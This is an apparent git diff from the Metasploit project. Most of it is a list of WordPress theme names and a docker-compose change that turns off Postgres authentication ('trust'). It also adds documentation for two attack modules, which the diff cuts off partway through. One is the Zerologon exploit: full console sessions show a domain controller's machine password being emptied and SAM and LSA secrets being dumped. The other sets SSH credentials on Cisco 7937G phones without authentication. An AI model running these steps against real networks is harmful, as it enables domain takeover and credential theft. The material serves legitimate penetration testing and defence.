vw-corporate-business
vw-corporate-lite
vw-corporate-lite-2
@@ -17980,6 +19789,7 @@ vw-lawyer-attorney
vw-magazine
vw-maintenance-services
vw-medical-care
vw-minimalist
vw-mobile-app
vw-mobile-app-red-canoa
vw-newspaper
@@ -17990,6 +19800,7 @@ vw-personal-trainer
vw-pet-shop
vw-photography
vw-portfolio
vw-real-estate
vw-restaurant-lite
vw-restaurant-lite2
vw-school-education
@@ -17997,6 +19808,7 @@ vw-security-guard
vw-solar-energy
vw-spa-lite
vw-startup
vw-storefront
vw-tour-lite
vw-transport-cargo
vw-travel
@@ -18026,6 +19838,7 @@ w016
w017
w018
w1redtech
w3css
w3t-fuseki
w7c_iz
wabc
@@ -18049,6 +19862,7 @@ walnut
walser
waltz-with-bashir
wanda
wanda-lite
wanderlust
waniliowa-noc
wappos
@@ -18065,6 +19879,7 @@ warmwinter
warna-warni
warpress-warhammer-wordpress-theme
warx
washing-center
washington
wasif
wasteland
@@ -18074,6 +19889,7 @@ water
water-drops-theme
water-lily
water-mark
water-sports-club
watercolor
waterloo
waternymph-and-dolphin
@@ -18084,6 +19900,7 @@ wave
wave-lite
wavefront
waves
wayne-blog-news
wbhosts
wbox
wbsimple
@@ -18105,13 +19922,16 @@ web-20-blue
web-20-pinky
web-20-simplified
web-app
web-conference
web-design-web8
web-development
web-grapple
web-host
web-hosting
web-hosting-theme
web-log
web-minimalist-200901
web-portfolio
web20-seo
web5
webagency
@@ -18127,6 +19947,7 @@ webdesign-theme
webdesignerdeveloper
webdiary
webeeo
webet
webgist
webgrapple
webify
@@ -18135,6 +19956,7 @@ weblizar
weblizar-brown
weblog
weblog-magazine_green
weblogs
webmagazine
webmedia
webmix-corporate
@@ -18145,6 +19967,7 @@ webpride
webshop
website
websiteright
websitesetup-business
websitez-mobile-theme
webstarslite
webstarterkitthirteen
@@ -18163,18 +19986,22 @@ wedding-band
wedding-bells
wedding-bells-lite
wedding-bride
wedding-couples
wedding-happily-ever-after
wedding-journal
wedding-party
wedding-photos
wedding-style
wedding_nardaa
weddingcity-lite
weddingindustry
weddinglist
weddingphotography
weddings
weddlist
weddmag
wedlock
wednesday
wefoster
weh-lite
weight-loss-tea
@@ -18190,6 +20017,7 @@ wellness-child
wen-associate
wen-business
wen-corporate
wepora
werka
west
western
@@ -18202,6 +20030,7 @@ wfclarity
wg-piccolo
wg-piccolo-theme
wgmc-uniform
whack-it
what-so-proudly-we-hail
whatnew
wheat
@@ -18271,8 +20100,11 @@ whitey08-green
whitish
whitish-lite
whitney
wholly
whoop
why-hello-there
wi-education
wi-travel
wic2015
wichita
wide-blog-happens
@@ -18284,6 +20116,7 @@ width-smasher
wigshop
wiilike
wijmo
wikidocs
wikiparaça
wikisquare
wikiwp
@@ -18293,6 +20126,7 @@ wild-safari-lite
wild-west
wildbook
wildfire
wildlife-lite
wiles
wilfrid
wilinia
@@ -18346,6 +20180,7 @@ wipi
wiral-lite
wiredrive-classic
wisdom-blog
wisdom-blog-123
wisdom-bold
wisdom-journal
wisdom-minimal
@@ -18354,6 +20189,10 @@ wise
wise-church
wisecat-11
wishbone
wishful-blog
wishful-travel
wishlist
wisnia
wiso
wispy-fish
wistarter
@@ -18365,7 +20204,10 @@ withtech
witness
wittgenstein
wix
wiz-ecommerce
wiziapp-smooth-touch
wk-wow
wkeducation
wlow
wodpresstheme-uri-httpwww-acmethemes-comthemessupermag
wolf
@@ -18374,6 +20216,7 @@ wolf-starter
women-clothing
women-theme
women_clothing
womenmagaz
wonder
wondrous
woo
@@ -18410,6 +20253,7 @@ woody
woody-smooth
wooeco
wooketing
woomart
woosti
woostifi
woostify
@@ -18423,8 +20267,11 @@ wordbluex
wordcraft
wordecho
wordgray
wordify
wordily
wordit
wordkit
wordly
wordnews
wordousel-lite
wordplus
@@ -18492,10 +20339,13 @@ worldwide
wortex-lite
worthy
wos
wow
wow-blackened
wow-blog
wow-blue
wow-pop
wowmag
wowpress
wowsome
wowza
wp
@@ -18513,6 +20363,7 @@ wp-awesome
wp-barrister
wp-bats-theme
wp-bedrock
wp-blen
wp-blog
wp-blogcrash
wp-blogger
@@ -18520,6 +20371,7 @@ wp-blogthirteen
wp-booti
wp-bootstrap
wp-bootstrap-4
wp-bootstrap-4-essentials
wp-bootstrap-starter
wp-bootstrap-starter-child
wp-bootstrap-starter-theme
@@ -18550,6 +20402,7 @@ wp-doppio
wp-dynamo
wp-eden
wp-enlightened
wp-fancy
wp-fanzone
wp-faster
wp-fastest
@@ -18570,10 +20423,12 @@ wp-headr
wp-hot-cook
wp-iclean-responsive
wp-igmg
wp-indigo
wp-inspirat
wp-inspire-writer
wp-inspiremagtheme-uri-httpinspirenxt-comthemeswp-inspiremagauthor-sajan-kota
wp-invictus
wp-jannah
wp-jekyll
wp-jurist
wp-knowledge-base
@@ -18581,9 +20436,12 @@ wp-knowledge-base-theme
wp-kube
wp-less-is-more
wp-lets
wp-liquid-web
wp-liteflex
wp-locksmith
wp-macchiato
wp-magazine
wp-magazine-pluss
wp-marketingstrap
wp-mashthirteen
wp-masonry
@@ -18595,10 +20453,12 @@ wp-mint-magazine
wp-movies
wp-mozilla-community-theme-v2
wp-my-business
wp-nathy
wp-news-classic
wp-news-stream
wp-newsmagazine
wp-nice-mix
wp-notebook
wp-one
wp-opencart
wp-opulus
@@ -18606,6 +20466,7 @@ wp-orange-inspirat
wp-ornate
wp-paper
wp-parastrap
wp-pendidikan
wp-perfect
wp-plumber
wp-plus
@@ -18656,6 +20517,7 @@ wp-tour-package
wp-trie
wp-tube-premium
wp-twitter-bootstrap
wp-uikit
wp-unframework
wp-weaver
wp-well-mixed
@@ -18668,6 +20530,7 @@ wp960gs
wp_contempo_plain
wp_edublog
wp_fall_theme
wp_lily
wp_monochrome
wp_qoob_theme
wp_shiftedblank
@@ -18678,6 +20541,8 @@ wpadzone-lite
wpagency
wpapi
wpapp-ninja
wpazure
wpbakers-really-simple
wpbeg
wpbeginner
wpblogger
@@ -18685,6 +20550,7 @@ wpbo
wpboot
wpbri
wpbricks
wpbstarter
wpburn-blue
wpbus-d4
wpbyd
@@ -18695,6 +20561,7 @@ wpcomic
wpcount
wpcouponcode
wpcrest
wpcrux
wpcs-ocean
wpd-inspire
wpdetail
@@ -18704,6 +20571,7 @@ wpdocs
wpeden-responsive
wpelegance2col
wpesp-portfolio-theme-coda
wpex-today
wpf-authority
wpf-flaty
wpf-ultraresponsive
@@ -18724,6 +20592,7 @@ wpjobman
wpl-twentyeight
wplab-pro-wpcms
wplabo-aries
wplaboaries
wplatformer
wplets
wplight-theme
@@ -18751,6 +20620,8 @@ wprast-standard
wprast-tech
wpress-me-fashion-blog
wprestyle
wpsection
wpsections
wpsense
wpsimplicity
wpsimplified
@@ -18776,6 +20647,7 @@ wpu-simple-clean
wpvision-lite
wpvkp-minimal-blog
wpxon-blog
wpxon-portfolio
wpyaml
wpyeasfi
wpyoutube
@@ -18787,6 +20659,9 @@ wrb-pxforce
wren
writ
write
write-and-read
write-and-read-s
write-and-read-v1-1
write-blog
write-blogging
writee
@@ -18795,6 +20670,7 @@ writee-grid
writee-parsi
writer
writer-blog
writera
writerblog
writers
writers-blog
@@ -18812,18 +20688,23 @@ writingstab
writr
written
writter
writy
wrock-metro
wsc
wsc6
wsc7
wsddc-vol1
wsddc_theme_vol1
wshop
wsq-light
wstrap
wsu-business
wtc-brown-gallery
wtgo-theme
wu-standard
wu-wei
wunderbar
wuqi
ww-design
www-eastbaybusinesses-com
www-eastbayservicebusinesses-com
@@ -18836,11 +20717,15 @@ x-bliss
x-blog
x-blog-color
x-blog-lite
x-blog-plus
x-business
x-corporate
x-crop
x-effect
x-magazine
x-mas
x-portfolio
x-shop
x-store
x-view
x2
@@ -18848,6 +20733,7 @@ x2-lite
x6
xabstract
xaklin
xavialite
xblog
xbloglite
xcandy
@@ -18857,6 +20743,7 @@ xclusive
xcode
xdwaken
xemifolio
xena
xeom
xevent-magazine
xevent-theme
@@ -18882,7 +20769,9 @@ xmas9
xmax
xmotion
xodogo
xolo
xonstruction
xooblog
xoxo
xoxolite
xperson-lite
@@ -18890,9 +20779,12 @@ xpinkfevertlx
xpressmag
xproweb
xseason
xshop
xsimply
xt-corporate-lite
xtempt
xtheme
xtraroofing
xtron
xwb
xxxx
@@ -18900,14 +20792,19 @@ xydw-blog
xylus
y
y2k
yaatra
yachting
yadayada-minimalismus
yadayada-zen
yaga
yahoo
yahui
yahya
yais
yajimuma
yala-blog
yala-mag
yala-travel
yalatech-education
yama
yamayama
@@ -18929,12 +20826,15 @@ yashfa
yasothon
yast-yet-another-standard-theme
yat_mattery
yatri
yayoga
yazigi
yb-auto
yb-light
ybloom
yboris
yboris-minimalist
yeadh
yeast-diet
yello20
yellow
@@ -18950,26 +20850,32 @@ yepza
yes-co-ores-theme
yesp
yeti-5
yeuloli
yeyita
yg-desire
yhsnews
yifengxuan
yinyang
yith-proteo
yleave
ymac
ymflyingred
ymoo
yo-manga
yo-yo-po
yo_fik
yocto
yoga
yoga_guru
yogaclub-lite
yogafitness
yogasana-lite
yogi
yogic-lite
yoko
yokospark
yolo-naveda
yolo-ready
yolo-seo
yomel
yonarex
@@ -19007,6 +20913,7 @@ yule
yume
yume-tan
yummy
yummy-recipe
yuniho
yuru2cafe
yuta
@@ -19014,6 +20921,7 @@ yuuta
yuviaakash
yuvix
yway
yydevelopment-basic
z-arcana
zack
zack-990
@@ -19024,6 +20932,9 @@ zaffre
zag
zaha-lee
zakra
zakra1
zakraaaaaaaaa
zala
zalive
zamura
zantourism
@@ -19043,6 +20954,7 @@ zbench1
zblackbeard
zblackbeard1
zblackbeardb
zboommusic
zborder
zcool-like
zdark
@@ -19073,6 +20985,8 @@ zeetasty
zeevision
zeko-lite
zelle-lite
zemez
zemix
zen
zen-bleu
zen-garden
@@ -19100,6 +21014,7 @@ zenpro
zensky
zenstory
zentepa
zentile
zento
zenwares
zenwater
@@ -19139,6 +21054,8 @@ zgrey
zhuti
zica-lite-one-page
zifer-child
zigcy-baby
zigcy-cosmetics
zigcy-lite
ziggydemar
zigzagblog
@@ -19159,6 +21076,7 @@ zion
zippy
zircone
zita
zita-storefront
zixnru-autumn
zixnru-theme
zkrally
@@ -19172,6 +21090,7 @@ zmooncake
znktheme-uri-httpssketchthemes-compremium-themesappointment-booking-wordpress-theme-for-consultants
zodiac-lite
zoe
zoko
zombie
zombie-apocalypse
zombiehost
@@ -19179,8 +21098,10 @@ zomer
zomernadia
zomg
zomghow
zonaed
zoner-lite
zoner-lite-aks
zonic
zoo
zoom-lite
zoom-theme
@@ -19189,6 +21110,7 @@ zopit
zotilz-lite
zotilz-lite-responsive-theme
zotilz-lite-responsive-wordpress-theme
zoto
zovees
zovees-blue
zsimply
@@ -19200,6 +21122,7 @@ ztech
ztest
ztheme-simplev20
zuari
zubin
zues
zuluocms
zupabuilder
File diff suppressed because one or more lines are too long
+10280 -3687
View File
File diff suppressed because it is too large Load Diff
+2
View File
@@ -15,6 +15,8 @@ services:
image: postgres:10-alpine
volumes:
- pg_data:/var/lib/postgresql/data
environment:
POSTGRES_HOST_AUTH_METHOD: trust
volumes:
pg_data:
@@ -0,0 +1,173 @@
## Vulnerable Application
A vulnerability exists within the Netlogon authentication process where the security properties granted by AES are lost
due to an implementation flaw related to the use of a static initialization vector (IV). An attacker can leverage this
flaw to target an Active Directory Domain Controller and make repeated authentication attempts using NULL data fields
which will succeed every 1 in 256 tries (~0.4%). This module leverages the vulnerability to reset the machine account
password to an empty string, which will then allow the attacker to authenticate as the machine account. After
exploitation, it's important to restore this password to it's original value. Failure to do so can result in service
instability.
The `auxiliary/gather/windows_secrets_dump` module can be used to recover the original machine account password which
can then be restored with this module by using the `RESTORE` action and setting the `PASSWORD` value.
## Verification Steps
1. Exploit the vulnerability to remove the machine account password by replacing it with an empty string
1. From msfconsole
1. Do: `use auxiliary/admin/dcerpc/cve_2020_1472_zerologon`
1. Set the `RHOSTS` and `NBNAME` values
1. Run the module and see that the original machine account password was removed
1. Recover the original machine account password
1. Do: `use auxiliary/gather/windows_secrets_dump`
1. Set the `RHOSTS` values
1. Set the `SMBUser` option to the NetBIOS name with a trailing `$`, e.g. `NBNAME$`
1. Set the `SMBPass` option to `aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0` (the hash of an empty password)
1. Run the module and search for the password in the output (`NBNAME$:plain_password_hex:`)
1. Restore the original machine account password
1. From msfconsole
1. Do: `use auxiliary/admin/dcerpc/cve_2020_1472_zerologon`
1. Set the action to `RESTORE`
1. Set the `RHOSTS`, `NBNAME` and `PASSWORD` values
1. Run the module and see that the original value was restored
## Options
### NBNAME
The NetBIOS name of the target domain controller. You can use the `auxiliary/scanner/netbios/nbname` module to obtain
this value. If this value is invalid the module will fail when making a Netlogon RPC request.
### PASSWORD
The hex value of the original machine account password. This value is typically recovered from the target system's
registry (such as by using the `auxiliary/gather/windows_secrets_dump` Metasploit module) after successfully setting the
value to an empty string within Active Directory using this module and the default `REMOVE` action.
This value is only used when running the module with the `RESTORE` action.
## Scenarios
### Windows Server 2019
First, exploit the vulnerability to remove the machine account password by replacing it with an empty string.
```
msf6 > use auxiliary/admin/dcerpc/cve_2020_1472_zerologon
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set RHOSTS 192.168.159.53
RHOSTS => 192.168.159.53
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set NBNAME WIN-GD5KVDKUNIP
NBNAME => WIN-GD5KVDKUNIP
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > show options
Module options (auxiliary/admin/dcerpc/cve_2020_1472_zerologon):
Name Current Setting Required Description
---- --------------- -------- -----------
NBNAME WIN-GD5KVDKUNIP yes The server's NetBIOS name
RHOSTS 192.168.159.53 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT no The netlogon RPC port (TCP)
Auxiliary action:
Name Description
---- -----------
REMOVE Remove the machine account password
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run
[*] Running module against 192.168.159.53
[*] 192.168.159.53: - Connecting to the endpoint mapper service...
[*] 192.168.159.53:6403 - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.53[6403] ...
[*] 192.168.159.53:6403 - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.53[6403] ...
[+] 192.168.159.53:6403 - Successfully authenticated
[+] 192.168.159.53:6403 - Successfully set the machine account (WIN-GD5KVDKUNIP$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) >
```
At this point the `exploit/windows/smb/psexec` module can be used to achieve code execution if desired. Set the `SMBUser` option to the
machine account and the `SMBPass` option to the empty password value.
Next, recover the original machine account password value using `auxiliary/gather/windows_secrets_dump`. Look for the `plain_password_hex`
value in the `$MACHINE.ACC` section.
```
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > use auxiliary/gather/windows_secrets_dump
msf6 auxiliary(gather/windows_secrets_dump) > set RHOSTS 192.168.159.53
RHOSTS => 192.168.159.53
msf6 auxiliary(gather/windows_secrets_dump) > set SMBUser WIN-GD5KVDKUNIP$
SMBUser => WIN-GD5KVDKUNIP$
msf6 auxiliary(gather/windows_secrets_dump) > set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
SMBPass => aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf6 auxiliary(gather/windows_secrets_dump) > run
[*] Running module against 192.168.159.53
[*] 192.168.159.53:445 - Service RemoteRegistry is already running
[*] 192.168.159.53:445 - Retrieving target system bootKey
[+] 192.168.159.53:445 - bootKey: 0xa11f7c33c8bab9e427dec59436dbb17d
[*] 192.168.159.53:445 - Saving remote SAM database
[*] 192.168.159.53:445 - Dumping SAM hashes
[*] 192.168.159.53:445 - Password hints:
No users with password hints on this system
[*] 192.168.159.53:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6df12cddaa88057f06a80b5ee73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d17ae931b73c5ad7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d17ae931b73c5ad7e0c089c0:::
[*] 192.168.159.53:445 - Saving remote SECURITY database
[*] 192.168.159.53:445 - Decrypting LSA Key
[*] 192.168.159.53:445 - Dumping LSA Secrets
$MACHINE.ACC
EXCHG\WIN-GD5KVDKUNIP$:plain_password_hex:4151e8f8490762bc47ec11855921aef606f9d37176aef0f43a3fc6dc4aefc4c0d7bb7b88ad635a11f94de37e0d82495bab1dec25ac9d547910f94332f4598de372c07635fba1f6592bd3bb5aeb827cb088b1cae8db872b59e267ccfef1df40580c8d918befb3c39d809a6c89767a466f88f40eb373f86cf20c9b6a07e89b596e14a44eae6a4ae55b92a481b71452a3bbab2d5735d70868b778541f3c6e4d1c8c097c086bc40d364c01d4520b8a86a217ac79b4e826b9dc2eedd0a834146e3f6fba7422960dbd4051f499be61eca4e1aeba786030acfdd21e9f5a98a35a3f0430cf0b536bff99163118a1c75ec852cc2d
EXCHG\WIN-GD5KVDKUNIP$:aes256-cts-hmac-sha1-96:127c328739d4406e6734684b971709acb2215f947b961355fa25b9b3fda38a08
EXCHG\WIN-GD5KVDKUNIP$:aes128-cts-hmac-sha1-96:becbe21ab050ccb1d8a5b908839fd95f
EXCHG\WIN-GD5KVDKUNIP$:des-cbc-md5:b5f843cec2e56220
EXCHG\WIN-GD5KVDKUNIP$:aad3b435b51404eeaad3b435b51404ee:ec3a7fa2158f1f705898d538ad3aafaf:::
...
[*] 192.168.159.53:445 - Decrypting NL$KM
[*] 192.168.159.53:445 - Dumping cached hashes
No cached hashes on this system
[*] 192.168.159.53:445 - Cleaning up...
[*] Auxiliary module execution completed
msf6 auxiliary(gather/windows_secrets_dump) >
```
Finally, restore the original value using this module.
```
msf6 auxiliary(gather/windows_secrets_dump) > use auxiliary/admin/dcerpc/cve_2020_1472_zerologon
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set ACTION RESTORE
ACTION => RESTORE
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > set PASSWORD 4151e8f8490762bc47ec11855921aef606f9d37176aef0f43a3fc6dc4aefc4c0d7bb7b88ad635a11f94de37e0d82495bab1dec25ac9d547910f94332f4598de372c07635fba1f6592bd3bb5aeb827cb088b1cae8db872b59e267ccfef1df40580c8d918befb3c39d809a6c89767a466f88f40eb373f86cf20c9b6a07e89b596e14a44eae6a4ae55b92a481b71452a3bbab2d5735d70868b778541f3c6e4d1c8c097c086bc40d364c01d4520b8a86a217ac79b4e826b9dc2eedd0a834146e3f6fba7422960dbd4051f499be61eca4e1aeba786030acfdd21e9f5a98a35a3f0430cf0b536bff99163118a1c75ec852cc2d
PASSWORD => 4151e8f8490762bc47ec11855921aef606f9d37176aef0f43a3fc6dc4aefc4c0d7bb7b88ad635a11f94de37e0d82495bab1dec25ac9d547910f94332f4598de372c07635fba1f6592bd3bb5aeb827cb088b1cae8db872b59e267ccfef1df40580c8d918befb3c39d809a6c89767a466f88f40eb373f86cf20c9b6a07e89b596e14a44eae6a4ae55b92a481b71452a3bbab2d5735d70868b778541f3c6e4d1c8c097c086bc40d364c01d4520b8a86a217ac79b4e826b9dc2eedd0a834146e3f6fba7422960dbd4051f499be61eca4e1aeba786030acfdd21e9f5a98a35a3f0430cf0b536bff99163118a1c75ec852cc2d
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > show options
Module options (auxiliary/admin/dcerpc/cve_2020_1472_zerologon):
Name Current Setting Required Description
---- --------------- -------- -----------
NBNAME WIN-GD5KVDKUNIP yes The server's NetBIOS name
PASSWORD 4151e8f8490762bc47ec11855921aef606f9d37176aef0f43a3fc6dc4aefc4c0d7bb7b88ad635a11f94de37e0d82495bab1dec25ac9d547910f94332f4598de372c07635fba1f6592bd3bb5aeb827cb088b1cae8db872b59e267ccfef1df40580c8d918befb3c39d809a6c89767a466f88f40eb373f86cf20c9b6a07e89b596e14a44eae6a4ae55b92a481b71452a3bbab2d5735d70868b778541f3c6e4d1c8c097c086bc40d364c01d4520b8a86a217ac79b4e826b9dc2eedd0a834146e3f6fba7422960dbd4051f499be61eca4e1aeba786030acfdd21e9f5a98a35a3f0430cf0b536bff99163118a1c75ec852cc2d no The password to restore for the machine account (in hex)
RHOSTS 192.168.159.53 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT no The netlogon RPC port (TCP)
Auxiliary action:
Name Description
---- -----------
RESTORE Restore the machine account password
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run
[*] Running module against 192.168.159.53
[*] 192.168.159.53: - Connecting to the endpoint mapper service...
[*] 192.168.159.53:6403 - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.53[6403] ...
[*] 192.168.159.53:6403 - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.53[6403] ...
[+] 192.168.159.53:6403 - Successfully set machine account (WIN-GD5KVDKUNIP$) password
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) >
```
@@ -0,0 +1,450 @@
## Vulnerable Application
[Cisco 7937G](https://www.cisco.com/c/en/us/support/collaboration-endpoints/unified-ip-conference-station-7937g/model.html) Conference Station.
This module has been tested successfully against firmware versions SCCP-1-4-5-5 and SCCP-1-4-5-7.
### Description
This module exploits a feature that should not be available via the web interface.
An unauthenticated user may set the credentials for SSH access to any username and
password combination desired, giving access to administrative functions through an SSH connection.
## Verification Steps
1. Obtain a Cisco 7937G Conference Station.
2. Enable Web Access and SSH Access on the device.
3. Start msfconsole
4. Do: `use auxiliary/admin/http/cisco_7937g_ssh_privesc`
5. Do: `set RHOSTS 192.168.1.10`
6. Do: `set USER test`
7. Do: `set PASS test`
8. Do: `run`
9. The conference station's SSH service should now be configured with the supplied USER:PASS.
## Options
### PASS
The desired password for setting SSH access
### USER
The desired username for setting SSH access
## Scenarios
### Cisco 7937G Running Firmware Version SCCP-1-4-5-7
#### Successful Scenario
```
msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
user => test
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
pass => test
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
rhosts => 192.168.110.209
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
[*] Running for 192.168.110.209...
[*] 192.168.110.209 - Attempting to set SSH credentials.
[*] 192.168.110.209 - SSH attack finished!
[*] 192.168.110.209 - Try to login using the supplied credentials test:test
[*] 192.168.110.209 - You must specify the key exchange when connecting or the device will be DoS'd!
[*] 192.168.110.209 - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(linux/ssh/cve_2020_16137) > exit
user@ubuntu:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
test@192.168.110.209's password:
$>help
Commands 1 to 21:
help - Shows basic help for all commands.
echo - Echoes all arguments (arbitrary parameters, up to 9)
psosMaxShow - Show max number of psos objects created.
psosFailuresShow - Show failures of psos api calls.
clearNetStats - Clear statistics counters in Ethernet Driver.
nicheShow - Show statistics of InterNiche stack.
psosIntStackShow - Show information on interrupt stack.
i - Display status of the specified process, or all running processes (Process_name (optional))
checkStack - Checks the stack.
reboot - Reboots the phone with an optional parameter.
logl - Set the lowest log level which will be displayed (0-6)
logs - Set the log level output for a given module ([module] [0-6])
logsa - Set the log level output for all modules. ([0-6])
logt - Set the log display type (0-2)
logd - Dump the log, parameter is reverse order or not.
logda - Print all available log modules and their current level.
setRtRender - Set real time rendering parameters for the log.
lfu - Send the logfiles to the provisioning server(no parameters).
del - Delete specified file.
cat - Concatanate specified files.
Commands 21 to 41:
copy - Copy a file, can be stdout.
ls - List the contents of flash.
ll - List the contents of flash.
d - Display memory. <address>,<num words>,<size words>
m - Display memory. <address>,<size words>
ping - Ping a given host (IP or DNS name) [,Data Len in Bytes]
ifShow - Display ethernet interface statistics (no parameters)
showStoredConfig - Display configuration as stored in flash (no parameters)
showRunningConfig - Display the current running configuration (no parameters)
showBackupConfig - Display backup configuration as stored in flash (no parameters)
overrideBackupConfig - Override backup flash config with current config (no parameters)
overrideSecurityBackup - Override backup security sector with current security sector.
resetConfig - Reset the phone to the default settings(setting type [SPIP],[SPIPCS],[SPIPShoreline])
configDhcpSet - Set DHCP parameters in the flash.
(DHCP Enabled[YES|NO], Offer Timeout, DHCP Option, DHCP Option Type,
Using statically configured boot server[YES|NO])
configDnsSet - Set DNS parameters in the flash. (Primary DNS Server, Secondary DNS Server, DNS Domain)
configNetSet - Set network parameters in the flash.
(IP Address, Subnet Mask, Router, VLAN(can be empty))
configProvisioningSet - Set provisioning server parameters in the flash.
(Server Name, Using server type[FTP|TFTP|HTTP|HTTPS|FTPS], User, Password)
configSntpSet - Set SNTP parameters in the flash. (sntpserverName,sntpgmtOffset)
nslookup - Find the IP for a given hostname
dnsCacheAShow - Show DNS Cache for A records.
Commands 41 to 61:
dnsCacheSrvShow - Show DNS Cache for SRV records.
dnsCacheAFlush - Flush DNS A records from cache.
version - Display vxWorks bootline, software versions, and hardware version.
hwBoardSerialSet - Set serial number. !!!!!Should never be used!!!!!.
hwVarSet - Set the contents of a hardware var ([var ID] [new value])
hwVarShow - Display the contents of a hardware var ([var ID])
simulateKeyPress - Send a key Press event to so like it came from hardware.
simulateKeyHold - Send a key Hold event to so like it came from hardware.
simulateKeyRelease - Send a key Release event to so like it came from hardware.
simulateHookUp - Send a hookswitch event to so like it came from hardware.
simulateHookDown - Send a hookswitch event to so like it came from hardware.
ncasMisc - Show misc. non-call information (no parameters)
ncasCb - Show detailed ncas information, related to either call services,
non-call services, or server information (1, 2, or 3)
uptime - Show phone uptime.
appPrt - Show UI's call status.
fntPrt - Show information about fonts available on phone.
memtop - Shows the top poiter to current memory.
removeScheduledLogEntry - debug
addScheduledLogEntry - debug
fatalError - Simulate fatal error for the phone.
Commands 61 to 81:
enableStrTruncLog - Enable logging of string truncation.
disableStrTruncLog - Disable logging of string truncation.
sendFlashBinImage - Upload binary flash image.
setMac - debug, here because PSOS can't set the MAC.
sg - send a bitmap to the boot server
memShow - Display system memory usage
memDebug - Toggle memory manager trace flag
l2Debug - Toggle memory manager trace flag
wsTest - Web Service Test Tool
fxShow - Display file transfer manager status
utilHostByNameShow - Test utilHostByName
utilDnsShow - Show callbacks for dns queries
dnsCacheShow - Show DNSACacheShow
utilEthLinkShow - Show Ethernet link status
ethConfigTest - Set Ethernet Mode (0 to 4)
timeTest - Test time
contrastChg - Change LCD Contrast
setAdminVlan - Set admin vlan id
setL2Auth - Set L2 Auth Enable/Disable
ipAddrChange - Change ip addr configuration
Commands 81 to 101:
tftpChange - Change tftp addr
arpStats - Print ARP statistics
fxPut - Transfer file to remote
crash - Crash the system
ipAddrShow - Show ip addr
rtosSocketShow - Show rtos socket information
sccpShow - Show protocol
regManagerShow - show registration manager state
uiPrintAll - uiPrintAll
uiPrintSoftKeys - uiPrintSoftKeys
getVoiceQuality - displays voice quality control status
uiPrintLocalSoftKeys - uiPrintLocalSoftKeys
uiStartTone - uiStartTone
uiStopTone - uiStopTone
pegPrintAll - pegPrintAll
uiSMPrintAll - uiStateMachinePrintAll
lldpSMPrintAll - lldpStateMachinePrintAll
saveLogLevels - saveLogLevels
localePrintAll - localePrintAll
ceShow - Show Client Engine Status
Commands 101 to 121:
udiShow - Show Unique Device Indentifier
show - Show Unique Device Indentifier
pbnShow - Display app & bootrom headers
upr - Upgrade to a Rockpile Standalone Image
upm - Upgrade to a Rockpile Manf Image
setHw - Sets the Rockpile Hardware Id
getHw - Prints the Rockpile Hardware Id
setUpf - Sets the Upgrade progress flag
rstUpf - Resets the Upgrade progress flag
setMdm - Sets the Manf diag mode flag
rstMdm - Resets the Manf diag mode flag
setDhcp - Sets the Manf diag dhcp flag
rstDhcp - Resets the Manf diag dhcp flag
setOrd - Sets the ORD flag
rstOrd - Resets the ORD flag
fs - Prin the status of rockpile flags
cp - Mfg. test diags
vol - Mfg. test diags
sig - Mfg. test diags
os - Mfg. test diags
Commands 121 to 141:
lcd - Mfg. test diags
sum - Prints checksums of flash images
rd - Mfg. test diags
wr - Mfg. test diags
eth - Start/stop ethernet hardware
fstp - Stop FGPIO interface
hfTxEq - Audio testing for large conf rooms
ctConv - perform ct convergence test.
ctModeEnd - terminate ctMode
ctEnableRx - Enable ctRx 1 on, 0 off
ctEnableTx - Enable ctTx 1 on, 0 off
ctMicTx - Route mic # to Tx
ctEMTx - Route external mic # to Tx
ctSineTx - [chan], [freq], [dBm]: Generate tone to Tx (0 => HD, 1 => HF, default HF, 1KHz, -40dBm)
ctRxSpkr - Send directly to HF speaker
ctSineSpkr - [chan], [freq], [dBm]: Generate tone to Rx (0 => HD, 1 => HF, default HF, 1KHz, -40dBm)
ctNoiseSpkr - [chan], [dBm]: Generate noise to Rx (0 => HD, 1 => HF, default HF, -40dBm)
displayListeningPorts - Display listening port and process info
killListeningProcess - Kill the task associated with the port
$>exit
```
#### Unsuccessful Scenario
```
